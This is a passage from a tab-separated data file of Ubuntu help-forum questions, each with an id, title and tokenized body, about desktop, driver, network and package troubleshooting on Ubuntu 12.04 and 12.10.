228169	unable to start sublime text	i had been using sublime text 2 with no issues . i installed idle and now i 'm unable to start sublime text . i tried uninstalling idle , but sublime text is still not starting . here 's the error : unable to load libgdk-x11-2.0.so unable to load gdk_cairo_create from libgdk-x11-2.0.so unable to load gdk_cursor_new_for_display from libgdk-x11-2.0.so unable to load gdk_cursor_unref from libgdk-x11-2.0.so unable to load gdk_error_trap_pop from libgdk-x11-2.0.so unable to load gdk_error_trap_push from libgdk-x11-2.0.so unable to load gdk_input_add from libgdk-x11-2.0.so unable to load gdk_input_remove from libgdk-x11-2.0.so unable to load gdk_keymap_translate_keyboard_state from libgdk-x11-2.0.so unable to load gdk_keyval_to_unicode from libgdk-x11-2.0.so unable to load gdk_pixbuf_new_from_file from libgdk-x11-2.0.so unable to load gdk_region_get_rectangles from libgdk-x11-2.0.so unable to load gdk_screen_get_default from libgdk-x11-2.0.so unable to load gdk_screen_get_display from libgdk-x11-2.0.so unable to load gdk_screen_get_height from libgdk-x11-2.0.so unable to load gdk_screen_get_rgb_colormap from libgdk-x11-2.0.so unable to load gdk_screen_get_rgba_colormap from libgdk-x11-2.0.so unable to load gdk_screen_get_root_window from libgdk-x11-2.0.so unable to load gdk_screen_get_width from libgdk-x11-2.0.so unable to load gdk_screen_get_n_monitors from libgdk-x11-2.0.so unable to load gdk_screen_get_monitor_geometry from libgdk-x11-2.0.so unable to load gdk_unicode_to_keyval from libgdk-x11-2.0.so unable to load gdk_window_get_frame_extents from libgdk-x11-2.0.so unable to load gdk_window_get_origin from libgdk-x11-2.0.so unable to load gdk_window_get_state from libgdk-x11-2.0.so unable to load gdk_window_invalidate_rect from libgdk-x11-2.0.so unable to load gdk_window_set_cursor from libgdk-x11-2.0.so unable to load gdk_window_move_resize from libgdk-x11-2.0.so unable to load gdk_x11_display_get_xdisplay from libgdk-x11-2.0.so unable to load gdk_x11_drawable_get_xid from libgdk-x11-2.0.so unable to load gdk_x11_get_server_time from libgdk-x11-2.0.so unable to load gdk_x11_get_xatom_by_name_for_display from libgdk-x11-2.0.so unable to load gdk_x11_window_set_user_time from libgdk-x11-2.0.so unable to load libgtk-x11-2.0.so unable to load gtk_accel_group_new from libgtk-x11-2.0.so unable to load gtk_accelerator_get_default_mod_mask from libgtk-x11-2.0.so unable to load gtk_box_get_type from libgtk-x11-2.0.so unable to load gtk_box_pack_start from libgtk-x11-2.0.so unable to load gtk_check_menu_item_get_type from libgtk-x11-2.0.so unable to load gtk_check_menu_item_new_with_label from libgtk-x11-2.0.so unable to load gtk_check_menu_item_set_active from libgtk-x11-2.0.so unable to load gtk_clipboard_clear from libgtk-x11-2.0.so unable to load gtk_clipboard_get from libgtk-x11-2.0.so unable to load gtk_clipboard_set_text from libgtk-x11-2.0.so unable to load gtk_clipboard_set_with_data from libgtk-x11-2.0.so unable to load gtk_clipboard_store from libgtk-x11-2.0.so unable to load gtk_clipboard_wait_for_text from libgtk-x11-2.0.so unable to load gtk_container_add from libgtk-x11-2.0.so unable to load gtk_container_get_children from libgtk-x11-2.0.so unable to load gtk_container_get_type from libgtk-x11-2.0.so unable to load gtk_container_remove from libgtk-x11-2.0.so unable to load gtk_dialog_add_button from libgtk-x11-2.0.so unable to load gtk_dialog_get_type from libgtk-x11-2.0.so unable to load gtk_dialog_run from libgtk-x11-2.0.so unable to load gtk_dialog_set_default_response from libgtk-x11-2.0.so unable to load gtk_drag_dest_set from libgtk-x11-2.0.so unable to load gtk_drag_finish from libgtk-x11-2.0.so unable to load gtk_file_chooser_add_filter from libgtk-x11-2.0.so unable to load gtk_file_chooser_dialog_new from libgtk-x11-2.0.so unable to load gtk_file_chooser_get_filename from libgtk-x11-2.0.so unable to load gtk_file_chooser_get_files from libgtk-x11-2.0.so unable to load gtk_file_chooser_get_type from libgtk-x11-2.0.so unable to load gtk_file_chooser_set_current_folder from libgtk-x11-2.0.so unable to load gtk_file_chooser_set_current_name from libgtk-x11-2.0.so unable to load gtk_file_chooser_set_do_overwrite_confirmation from libgtk-x11-2.0.so unable to load gtk_file_chooser_set_local_only from libgtk-x11-2.0.so unable to load gtk_file_chooser_set_select_multiple from libgtk-x11-2.0.so unable to load gtk_file_filter_add_pattern from libgtk-x11-2.0.so unable to load gtk_file_filter_new from libgtk-x11-2.0.so unable to load gtk_file_filter_set_name from libgtk-x11-2.0.so unable to load gtk_get_current_event_time from libgtk-x11-2.0.so unable to load gtk_im_context_filter_keypress from libgtk-x11-2.0.so unable to load gtk_im_context_set_client_window from libgtk-x11-2.0.so unable to load gtk_im_multicontext_new from libgtk-x11-2.0.so unable to load gtk_init from libgtk-x11-2.0.so unable to load gtk_main from libgtk-x11-2.0.so unable to load gtk_main_quit from libgtk-x11-2.0.so unable to load gtk_menu_attach_to_widget from libgtk-x11-2.0.so unable to load gtk_menu_bar_new from libgtk-x11-2.0.so unable to load gtk_menu_get_type from libgtk-x11-2.0.so unable to load gtk_menu_item_get_label from libgtk-x11-2.0.so unable to load gtk_menu_item_get_submenu from libgtk-x11-2.0.so unable to load gtk_menu_item_get_type from libgtk-x11-2.0.so unable to load gtk_menu_item_new_with_label from libgtk-x11-2.0.so unable to load gtk_menu_item_set_label from libgtk-x11-2.0.so unable to load gtk_menu_item_set_submenu from libgtk-x11-2.0.so unable to load gtk_menu_item_set_use_underline from libgtk-x11-2.0.so unable to load gtk_menu_new from libgtk-x11-2.0.so unable to load gtk_menu_popup from libgtk-x11-2.0.so unable to load gtk_menu_shell_append from libgtk-x11-2.0.so unable to load gtk_menu_shell_get_type from libgtk-x11-2.0.so unable to load gtk_message_dialog_new from libgtk-x11-2.0.so unable to load gtk_message_dialog_new_with_markup from libgtk-x11-2.0.so unable to load gtk_selection_data_get_uris from libgtk-x11-2.0.so unable to load gtk_selection_data_set_text from libgtk-x11-2.0.so unable to load gtk_separator_menu_item_new from libgtk-x11-2.0.so unable to load gtk_settings_get_default from libgtk-x11-2.0.so unable to load gtk_show_uri from libgtk-x11-2.0.so unable to load gtk_vbox_new from libgtk-x11-2.0.so unable to load gtk_widget_add_accelerator from libgtk-x11-2.0.so unable to load gtk_widget_add_events from libgtk-x11-2.0.so unable to load gtk_widget_destroy from libgtk-x11-2.0.so unable to load gtk_widget_get_display from libgtk-x11-2.0.so unable to load gtk_widget_get_parent from libgtk-x11-2.0.so unable to load gtk_widget_get_screen from libgtk-x11-2.0.so unable to load gtk_widget_get_type from libgtk-x11-2.0.so unable to load gtk_widget_get_window from libgtk-x11-2.0.so unable to load gtk_widget_grab_focus from libgtk-x11-2.0.so unable to load gtk_widget_hide from libgtk-x11-2.0.so unable to load gtk_widget_remove_accelerator from libgtk-x11-2.0.so unable to load gtk_widget_set_app_paintable from libgtk-x11-2.0.so unable to load gtk_widget_set_colormap from libgtk-x11-2.0.so unable to load gtk_widget_set_double_buffered from libgtk-x11-2.0.so unable to load gtk_widget_set_sensitive from libgtk-x11-2.0.so unable to load gtk_widget_show from libgtk-x11-2.0.so unable to load gtk_widget_show_all from libgtk-x11-2.0.so unable to load gtk_window_add_accel_group from libgtk-x11-2.0.so unable to load gtk_window_fullscreen from libgtk-x11-2.0.so unable to load gtk_window_get_type from libgtk-x11-2.0.so unable to load gtk_window_iconify from libgtk-x11-2.0.so unable to load gtk_window_maximize from libgtk-x11-2.0.so unable to load gtk_window_move from libgtk-x11-2.0.so unable to load gtk_window_new from libgtk-x11-2.0.so unable to load gtk_window_present_with_time from libgtk-x11-2.0.so unable to load gtk_window_remove_accel_group from libgtk-x11-2.0.so unable to load gtk_window_resize from libgtk-x11-2.0.so unable to load gtk_window_set_default_icon_list from libgtk-x11-2.0.so unable to load gtk_window_set_default_size from libgtk-x11-2.0.so unable to load gtk_window_set_keep_above from libgtk-x11-2.0.so unable to load gtk_window_set_modal from libgtk-x11-2.0.so unable to load gtk_window_set_position from libgtk-x11-2.0.so unable to load gtk_window_set_title from libgtk-x11-2.0.so unable to load gtk_window_set_transient_for from libgtk-x11-2.0.so unable to load gtk_window_set_type_hint from libgtk-x11-2.0.so unable to load gtk_window_stick from libgtk-x11-2.0.so unable to load gtk_window_unfullscreen from libgtk-x11-2.0.so unable to load cairo_clip from libcairo.so unable to load cairo_create from libcairo.so unable to load cairo_destroy from libcairo.so unable to load cairo_fill from libcairo.so unable to load cairo_font_options_create from libcairo.so unable to load cairo_font_options_destroy from libcairo.so unable to load cairo_font_options_set_antialias from libcairo.so unable to load cairo_get_source from libcairo.so unable to load cairo_image_surface_create from libcairo.so unable to load cairo_image_surface_create_for_data from libcairo.so unable to load cairo_image_surface_get_data from libcairo.so unable to load cairo_image_surface_get_format from libcairo.so unable to load cairo_image_surface_get_height from libcairo.so unable to load cairo_image_surface_get_stride from libcairo.so unable to load cairo_image_surface_get_width from libcairo.so unable to load cairo_line_to from libcairo.so unable to load cairo_matrix_init_scale from libcairo.so unable to load cairo_matrix_init_translate from libcairo.so unable to load cairo_matrix_translate from libcairo.so unable to load cairo_move_to from libcairo.so unable to load cairo_paint_with_alpha from libcairo.so unable to load cairo_pattern_set_extend from libcairo.so unable to load cairo_pattern_set_matrix from libcairo.so unable to load cairo_rectangle from libcairo.so unable to load cairo_reset_clip from libcairo.so unable to load cairo_restore from libcairo.so unable to load cairo_save from libcairo.so unable to load cairo_set_line_width from libcairo.so unable to load cairo_set_operator from libcairo.so unable to load cairo_set_source_rgb from libcairo.so unable to load cairo_set_source_rgba from libcairo.so unable to load cairo_set_source_surface from libcairo.so unable to load cairo_stroke from libcairo.so unable to load cairo_surface_destroy from libcairo.so unable to load cairo_surface_flush from libcairo.so unable to load cairo_translate from libcairo.so unable to load cairo_scale from libcairo.so unable to load pango_font_description_free from libpango-1.0.so unable to load pango_font_description_new from libpango-1.0.so unable to load pango_font_description_set_family from libpango-1.0.so unable to load pango_font_description_set_size from libpango-1.0.so unable to load pango_font_description_set_style from libpango-1.0.so unable to load pango_font_description_set_weight from libpango-1.0.so unable to load pango_font_get_metrics from libpango-1.0.so unable to load pango_font_map_load_font from libpango-1.0.so unable to load pango_font_metrics_get_ascent from libpango-1.0.so unable to load pango_font_metrics_get_descent from libpango-1.0.so unable to load pango_font_metrics_unref from libpango-1.0.so unable to load pango_language_get_default from libpango-1.0.so unable to load pango_layout_get_context from libpango-1.0.so unable to load pango_layout_get_pixel_extents from libpango-1.0.so unable to load pango_layout_set_font_description from libpango-1.0.so unable to load pango_layout_set_text from libpango-1.0.so unable to load pango_cairo_context_set_font_options from libpangocairo-1.0.so unable to load pango_cairo_create_layout from libpangocairo-1.0.so unable to load pango_font_map_create_context from libpangocairo-1.0.so unable to load pango_cairo_font_map_get_default from libpangocairo-1.0.so unable to load pango_cairo_show_layout from libpangocairo-1.0.so unable to load pango_cairo_update_layout from libpangocairo-1.0.so unable to load all required gtk functions unable to init px any solutions ? thanks !
228174	both firefox and chromium have problem with loading webpages	i 'm using ubuntu 12.04 and always up to date . my internet speed is good . when i download something , it downloads with a good speed . but in case of browsing , not a single page load completely in both browser . there is always a moving wheel . some websites take more than 5 minutes to load . ( google analytics ) if there is a slider in the web-page , the slider does n't load . on tab , the moving wheel is moving . please help ... .
228176	how to let ubuntu know i have installed a third party application ?	i installed eclipse in ubuntu , but not from ubuntu software center . i just downloaded the package from eclipse.org and extracted it to /opt/ and created a symbolic link in /usr/bin and a .desktop file for it in /usr/share/applications/ . after changing an icon theme , all other app 's icons change but eclipse does n't . and i find the icon for eclipse in /usr/share/icons/ and change the content of the related .desktop file . though eclipse has the icon i want now , its size is too big and it really does not coordinate with others . i have a little obsession , and i do n't how to change the size of it . i tried to add iconsize= ... in the .desktop file , but it did n't work . so , any help ? or how to let ubuntu know i have installed eclipse , and if i change the icon theme , it would change automatically ?
228177	how do you set your default bittorrent application ?	additional details are : os = 12.10 present default torrent application = qbittorrent preferred default torrent application = vuze my main area in of which i 'm looking for advise is magnet links . plus the program in question is n't 'installed ' per say i have downloaded the tarball file for vuze and i run the executable file from there to run it .
228178	change ipad setting back from do nothing in nautilus	it use to open file explorer ( nautilus ) when i plugged it in . i messed up and set it to `` do nothing '' . now it wo n't see it at all , and my virtual box ca n't see it either . where is the setting so i can change it back to ask ? i went to settings > detail , but i did n't see it in removable devices . any help would be great . i 'm on 12.10 ubuntu . thanks
228179	why does my terminal attempt to execute 'sudo apt-get update ' at every launch ?	every time i launch a terminal it attempts to execute sudo apt-get update this happens regardless of which terminal emulator is used - both guake and gnome-terminal do it at least . it also does the behavior upon creating new tabs within either terminal application or when logging into different ttys . any time a new bash is started it seems . additionally , the command inexplicably fails ( command not found ) - though it executes perfectly if i type it in manually . how can i make this strange terminal quirk desist ?
228181	display problem when adjusting brightness in ubuntu 12.04	recently i installed ubuntu 12.04 on my dell 1554 laptop . i was adjusting my screen brightness when this happened : this has become a recurring problem which is really annoying . i also want to tell you that : i have installed the graphics drivers ati/amd fglrx graphics driver . i have got my graphics driver checked by dell . can anybody tell me a solution to this and moreover is anybody out there who is having the same problem ? thanks in advance . h/w and s/w details : dell studio 1554 processor : intel® core™ i5 cpu m 430 @ 2.27ghz × 4 memory : 4 gb vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] os : ubuntu release 12.04 ( precise ) 64-bit kernel : linux 3.2.0-34-generic
228182	does linux support intel dvmt ?	does linux ( ubuntu in particular ) support intel dvmt ? i 've intel i5-2500k , 8gb ram with no graphics card . it has inbuilt 32mb dedicated graphics memory . in my windows os , graphics memory is dynamically allocated from ram ( which goes up-to 1.7gb ) and most of the games works fairly well at low fps . as ubuntu is in a way to become a gaming platform , i would like to know weather intel dvmt is supported .
228183	mounted devices history	does ubuntu keep the history of the devices that were mounted ( i.e . usb devices , external drives etc ... ) . if this is the case where can i find it ?
228184	local wordpress installation , plugin installation and file permissions	i have a local wordpress installation and got everything working , until i tried to install a new plugin . trying to activate the plugin , wordpress asked me for ftp connection information , which i understood to be a failure of write-access to the plugins directory . apache runs as www-data , so i ran sudo chown -r www-data : /var/www/wordpress to make the wordpress directory writable for apache . but now , i can not edit the files as user anymore . changing file permissions back to chown -r user : /var/www/wordpress/wp-content/themes , the wordpress dashboard complains again , that it does n't have sufficient access . i tried various `` solutions '' online , but none have worked so far . do i really need to install something like proftp and create an ftp user & password for my local server ? or can i circumvent the problem with some nifty file permission settings , which allow both me and apache to access/write the files ?
228186	how to recover password without restart	so i recently installed ubuntu on this computer , i just started using it today for the 2nd time , i needed to install some video plugins to use for the web and it asked me for a password . i do not remember ever setting a password during installation , and i am not asked for a password to login either . as far as i knew i never had a password before , is there a way to recover the user password from within ubuntu without entering into recovery mode ? i do not see why i need to restart as i never need a password to start up the computer and log in ...
228196	intel sna and flash plugin	i switched my intel graphic acceleration from uxa to sna mode in my xubuntu 12.10 64 bit . its performance is great ! but i have an issue with firefox+flash plugin.flash plugin crashes whenever i open a new web page that has some flash objects on it.but i do n't have any problem with google chrome with intel sna . this issue will be gone when i switch back to uxa . is there any work around that i could use intel sna with flash plugin on firefox ?
228199	problem with apt-get update on ubuntu server	i have ubuntu 32 bit 12.04 server edition but i am having issues with apt-get updating . the server is able to ping the outside world ( both 8.8.8.8 and www.google.com ) but when i attempt to sudo apt-get update the first bit works but then i get this : if i attempt to check or autoclean with : sudo apt-get check i get this : i have tried the fix detailed here : how do i fix a `` problem with mergelist '' error when trying to do an update ? but it does not work , the same thing occurs again . any suggestions ? ps . the server is a fresh install , no external programs have been added . edit : we have tried using different sources , both aarnet and au.archive sources were tried .
228202	how to change my hostname ?	my hostname is localhost , reported by hostname command , and terminal prompt root @ localhost : ~ # . how can i change it to mismis.com with mismis alias ? and what is the proper configuration . i confused after reading some articles on web . my /etc/hosts : 127.0.0.1 localhost 127.0.1.1 srv345.myweb.com srv345 178.162.231.61 janstone.mismis.com janstone # the following lines are desirable for ipv6 capable hosts : :1 localhost ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
228203	sharing ethernet with android device	i used connectify on windows , i 'm looking for something similar to share my ethernet on laptop connection with my nexus s. i tried adhoc mode already ( as described in how to share a wired internet connection with an android phone ? ) , but that wo n't work since i 'm running stock android 4.2 and not cm .
228210	my ubuntu 12.10 will not start	i 'll boot my computer , then it 'll get going , go to a purple screen and then my monitor goes to sleep , i 've restarted it several times , and tried to get it to boot , no matter what it keeps going to the black screen . i 've tried reinstalling ubuntu , i 've even tried both 64 bit , and 32 bit . i have not once got it to a normal boot successfully either.it just wo n't run in normal boot , so i 'm resorted to using safe mode , please help me , idk what to do .
228211	how do i enable a webapp if i refused to in the past ?	if i said no to enabling a webapp , in the past , how do i change my mind and enable it ?
228212	no desktop after installation of nvidia drivers	i have a problem very similar to this guy : desktop does not show when i installed nvidia drivers ! . i have the same problem with the desktop not being present when i install choose the nvidia drivers from the software sources dialog . i 've trie the answer mark as the solution , but this does n't help me . still get the same result / bug . i 've also tried just to reconfigure it , like this guy says : http : //ubuntuforums.org/showpost.php ? p=12303179 & postcount=4 , but that did n't help me either . then someone suggested that i should try bumblebee . i followed the installation ( https : //wiki.ubuntu.com/bumblebee # installation ) and after the reboot the resolution was still crappy , but this time the desktop did show up , but with bad graphics and i could n't use optirun and it turned out that bumblebee could n't start . i hope someone might know whats wrong or what i 'm doing wrong . i have a lenovo w520 with a nvidia quadro fx 880m and i 'm running ubuntu 12.10
228217	xfce 4.10 panel auto hide feature stops working on occasions	after upgrade to xubuntu 12.04 xfce panel auto hide feature has stopped working.this happens especially after launching applications in full screen mode . after restart it goes back to normal . but it is irritating to restart everytime to make it work .
228222	mozilla addons not working properly in ubuntu 12.04	i have encountered a problem in mozilla . i am unable to install/uninstall the plugins . i do n't why it is happening . : ( i am using ubuntu 12.04 . please help me out
228225	is it possible to install oracle database express on 32bit ubuntu 12.10 ?	if it is possible , how is the step-by-step installation done ?
228229	how to edit pdf document ?	usually i receive a pdf contract that i need to sign and send back online . i am wondering what is the easiest way to do so on computer , to avoid the hassle of print/sign/scan process ?
228233	linux ( ubuntu 12.10 ) starts up , but the main menu on the left side , and the pictograms at the upper right corner , do not show up	linux os ( ubuntu 12.10 ) starts up ( user login , my personal picture of a beautiful norwegian fjord-landscape fills the background ) , but the main menu on the left side , and the pictograms ( battery state etc . ) at the upper right corner of the screen , do not show up . this occurred yesterday quite suddenly after six or seven weeks working with ubuntu 12.10 . then i started in recovery mode and performed a file system check ( fsck ) but that takes hours and finally a message â¨sorry ubuntu has experienced an internal error etcâ¨ appeared . how can i determine what has gone wrong and eventually , how can i solve it ? so that i can work again using ubuntu 12.10 ( on a dual-boot system , intel i7 , asus p8p67 motherboard ) .
228237	ubuntu 12.10 not updating . failed to download repository information	i recently tried to update by using the update manager , the update stopped and i received the error message : failed to download repository information w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what is the problem ?
228242	can not run a linux binary	i was trying to run a linux binary from this site : http : //www.robots.ox.ac.uk/~vgg/research/affine/descriptors.html # binaries specifically , the `` compute_descriptors.ln '' however , the terminal only responded with command not found . the extension also looks very uncommon . i am running ubuntu 12.10 .
228243	ao522 ubuntu 12.10 several reboot incase of black screen	my acer aspire one 522 with a new ubuntu 12.10 or kubuntu 12.10 installation ( dual boot with win7 ) sometimes has a black screen but if i reboot once or more , i can login on desktop . how can i fix this problem ?
228245	installation of the unity stock ticker lens failed	the following packages have unmet dependencies : unity-stock-ticker-lens : depends : python-unity-singlet ( > = 0.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
228246	how can i get last update time from ssh	i 'm having problems getting last update time ( like i see sometimes in update manager ) . do you think it 's possible to get from ssh a file/command that will show last update check for the current system ? thank you
228261	unable to boot ubuntu properly	i have amd radeon 7470m 1gib garphics card . i installed ubuntu in the nomodeset , after my first boot , i just opened it from boot screen by pressing 'e ' and replaced âquiet splashâ with `` nomodeset '' . it worked fine ; i can log in but after that i installed amd catalyst drivers for my graphics card . they are not working and even i opened the rc.local file as the root user 'sudo nano /etc/rc.local ' copied and pasted the following lines just before the line exit 0 : 1 ) chown -r $ user : $ user /sys/kernel/debug 2 ) echo off > /sys/kernel/debug/vgaswitcheroo/switch it does n't work for me . every time which i boot to os i need to replace `` quite splash '' with `` nomodeset '' by pressing 'e ' in the boot screen ; only then can i log in to ubuntu . how can i fix this ? it 's very difficult to replace that thing every time . thank you
228263	pptp vpn connects via nm but goes down during ssh connection	i setup a vpn pptp connection via network manager and it connects correctly ( i see the lock near the notification icon and the message `` vpn connection has been successfully ... '' ) as soon as i try to perform any ssh connection via the established tunnel the connection itself goes down with the message `` vpn connection failed '' . the ssh connection always fails at debug1 : ssh2_msg_kexinit sent i 've looked into the system logs and this is the log dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > starting vpn service 'pptp ' ... dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 7093 dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > vpn service 'pptp ' appeared ; activating connections dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state changed : init ( 1 ) dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state changed : starting ( 3 ) dec 12 12:25:00 ushuaia networkmanager [ 1155 ] : < info > vpn connection 'redation ' ( connect ) reply received . dec 12 12:25:05 ushuaia networkmanager [ 1155 ] : < info > vpn connection 'redation ' ( ip4 config get ) reply received from old-style plugin . dec 12 12:25:05 ushuaia networkmanager [ 1155 ] : < info > vpn gateway : 5.98.141.210 dec 12 12:25:06 ushuaia networkmanager [ 1155 ] : < info > vpn connection 'redation ' ( ip config get ) complete . dec 12 12:25:06 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state changed : started ( 4 ) dec 12 12:25:14 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state changed : stopping ( 5 ) dec 12 12:25:14 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state changed : stopped ( 6 ) dec 12 12:25:14 ushuaia networkmanager [ 1155 ] : < info > vpn plugin state change reason : 0 dec 12 12:25:15 ushuaia networkmanager [ 1155 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . dec 12 12:25:20 ushuaia networkmanager [ 1155 ] : < info > vpn service 'pptp ' disappeared please note that the same vpn is configured on my colleagues windows 7 and works without problem when they use putty to connect via ssh
228264	no internet ( wireless nor wired ) on hp 6735b after upgrade to 12.10	so i 've got a hp 6735b laptop . when i installed ubuntu 12.04 on it , i did n't have any wireless . after i downloaded the drivers via wired connection everything worked fine . now i 've upgraded to 12.10 and i can connect to wireless , but it does n't allow me to browse . i can also connect to wired internet , but that as well does n't allow me to browse or do any update , install , upgrade . i checked proxy settings and they are off . what is strange though , is that pinging to google.be gives : '' ping : unknown host google.be '' but pinging to 8.8.8.8 works as it should '' ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . '' pinging 8.8.8.8 ( google dns ) works without dropping a package or whatsoever . i also tried it on another network and that does n't work either . advice on how to fix ? fixed method below thx to maggotbrain and @ spruyttej ( on twitter ) i was able to browse again . can you edit the file /etc/resolv.conf , adding the line nameserver 8.8.8.8 to it and browse from your wired connection ? â maggotbrain the file maggotbrain talked about did not exist . so i did : sudo nano /etc/resolv.conf and then added nameserver 8.8.8.8 to the file . i rebooted and my internet was working . though i was n't certain whether this was a fix or a workaround . on twitter @ spruyttej told me to run : sudo apt-get install resolvconf ; sudo dpkg-reconfigure resolvconf ; this rewrote the /etc/resolv.conf file . i 'm now browsing happily . thx guys !
228270	system-wide screen contrast change in unity 2d on compaq 6720s	i have read many threads but not found how can i change contrast system-wide in unity 2d for my compaq 6720s . any advice ?
228271	ubuntu doesnt detect one partition on dual boot with windows 7	i have windows 7 and ubuntu 12.04 in my dell inspiron 5010 . i have these three partitions in my lap . c ( windows sys ) , d , f . i have installed ubuntu alongside but when i log in to ubuntu i can only see 2 partitions c and f. partition d is not showing up in my ubuntu . i have all my medias in thet partitions so if i wan na hear a music i have to log in to windows : ( please help .
228272	how to pass traffic from static ip on my router through ubuntu firewall to lan ip	i have a router that has 5 static ip addresses set on it . these external static ip 's are mapped to internal ip 's on our lan . we currently have no firewall or proxy set up , so i can not monitor user bandwidth usage or block content . i have set up an ubuntu firewall with 2 network cards and squid proxy and am able to connect to the internet via the firewall from a workstation within the lan . i am also familiar with port forwarding through the ubuntu firewall , however , how can i map an external ip address to an address on the internal ip ? the router has a static ip address on the lan ( 192.168.0.2 ) , my ubuntu firewall has a static ip address of 192.168.0.3 on the `` wan '' network card and an address of 10.10.10.1 on the `` lan '' network card . my clients on the lan are within the address range of 10.10.10.1 - 10.10.10.255 . any help would be appreciated . regards
228274	php 5.4 interactive mode on ubuntu 12.04	i 'm a big fan of php interactive mode ( php -a ) . today i decided to install php 5.4 to play around a little bit . it 's fun to use the new built-in server and all that stuff , but i was very sad when i discovered that the interactive mode does n't work . i installed php 5.4 on my ubuntu by adding the ppa : add-apt-repository ppa : ondrej/php5 apt-get update apt-get install php5 and this is what i get when i run php -a : $ php -a interactive mode enabled aaaaand nothing more . as far as i know this ppa follows the newest php5 maintained by debian pkg php team and as far as i know the interactive mode is also usually broken on freshly installed debians . any ideas on how to get it back ? preferably using some other ppa or at least without compiling - that 's usually less painful .
228276	how to make users gain root privileges from another account ?	how can i make something like that : there are two users : user with normal privileges , and administrator with admin privileges . i want to make it like that : user @ localhost : ~ $ sudo vim [ sudo ] password for administrator : < admin 's password here > and i am on the administrator account now .
228283	upgrading gnu awk on ubuntu 12.04	i would like to upgrade gnu awk version 3.1.8 to the latest version . how can i upgrade versions using ubuntu 12.04 ?
228284	hybrid amd/intel and tearing	this is getting really really boring ! is there any way to get rid of video tearing using fglrx ? i have a hybrid system with intel hd3000 ( sandybridge ) and amd 6770m . i have tried everything like turning vsync on from ccc , ticking set vblank in compiz settings manager , setting 1 for xv in vlc , using opengl in vlc , enabling gpu acceleration in vlc , setting texture video sync on in xorg.conf and others ... . i have video tearing also in youtube . when i use the intel card everything is fine . i have tried also the tearfree desktop even though it 's not in ccc , i ve enabled it through terminal . i have used 12.11 beta . is this fglrx 's problem ? unity 's ? i even tried with cinnamon ... i was in 12.10 but i downgraded to 12.04 because there were a lot of problems with fglrx and xorg . does anyone know if there 's a tear free desktop using hybrid and linux ? thanks in advance ... .
228288	what does sudo service do ?	as far as i know and it seems that other people have the same opinion sudo is a command that executes something with administrative privileges . however when i run rcconf i can see this line : [ * ] sudo provide limited super user privileges to specific users so what the point with this service ? or is this even a service ?
228292	my update manager is not working	an error occurred , please run package manager from the right-click menu or apt-get in terminal to see what is wrong . the error message was : 'unknown error : ' < type 'exceptions.system error ' > ' ( 'e : the package tty-mscorefonts-installer needs to be reinstalled , but i ca n't find an archive for it . ' this usually means that your installed packages have unmet dependencies
228295	weird output of 12.04 server on terminal from the start	i 'm trying to install xbmc on ubuntu 12.04 lts server . after installing nvidia-current and xinit , the machine boots up in text mode , no surprise there , but just prints bogus letters like shown in the picture . i 've no idea what went wrong . i 'd apreciate your help . my graphics card according to lspci is a gforce 8200 : % lspci 00:00.0 ram memory : nvidia corporation mcp78s [ geforce 8200 ] memory controller ( rev a2 ) 00:01.0 isa bridge : nvidia corporation mcp78s [ geforce 8200 ] lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp78s [ geforce 8200 ] smbus ( rev a1 ) 00:01.2 ram memory : nvidia corporation mcp78s [ geforce 8200 ] memory controller ( rev a1 ) 00:01.3 co-processor : nvidia corporation mcp78s [ geforce 8200 ] co-processor ( rev a2 ) 00:01.4 ram memory : nvidia corporation mcp78s [ geforce 8200 ] memory controller ( rev a1 ) 00:02.0 usb controller : nvidia corporation mcp78s [ geforce 8200 ] ohci usb 1.1 controller ( rev a1 ) 00:02.1 usb controller : nvidia corporation mcp78s [ geforce 8200 ] ehci usb 2.0 controller ( rev a1 ) 00:04.0 usb controller : nvidia corporation mcp78s [ geforce 8200 ] ohci usb 1.1 controller ( rev a1 ) 00:04.1 usb controller : nvidia corporation mcp78s [ geforce 8200 ] ehci usb 2.0 controller ( rev a1 ) 00:06.0 ide interface : nvidia corporation mcp78s [ geforce 8200 ] ide ( rev a1 ) 00:07.0 audio device : nvidia corporation mcp72xe/mcp72p/mcp78u/mcp78s high definition audio ( rev a1 ) 00:08.0 pci bridge : nvidia corporation mcp78s [ geforce 8200 ] pci bridge ( rev a1 ) 00:09.0 ide interface : nvidia corporation mcp78s [ geforce 8200 ] sata controller ( non-ahci mode ) ( rev a2 ) 00:0a.0 ethernet controller : nvidia corporation mcp77 ethernet ( rev a2 ) 00:10.0 pci bridge : nvidia corporation mcp78s [ geforce 8200 ] pci express bridge ( rev a1 ) 00:12.0 pci bridge : nvidia corporation mcp78s [ geforce 8200 ] pci express bridge ( rev a1 ) 00:13.0 pci bridge : nvidia corporation mcp78s [ geforce 8200 ] pci bridge ( rev a1 ) 00:14.0 pci bridge : nvidia corporation mcp78s [ geforce 8200 ] pci bridge ( rev a1 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 02:00.0 vga compatible controller : nvidia corporation nv44 [ geforce 7100 gs ] ( rev a1 ) the tv is hooked up via a dvi-hdmi cable , which i checked . so this is not 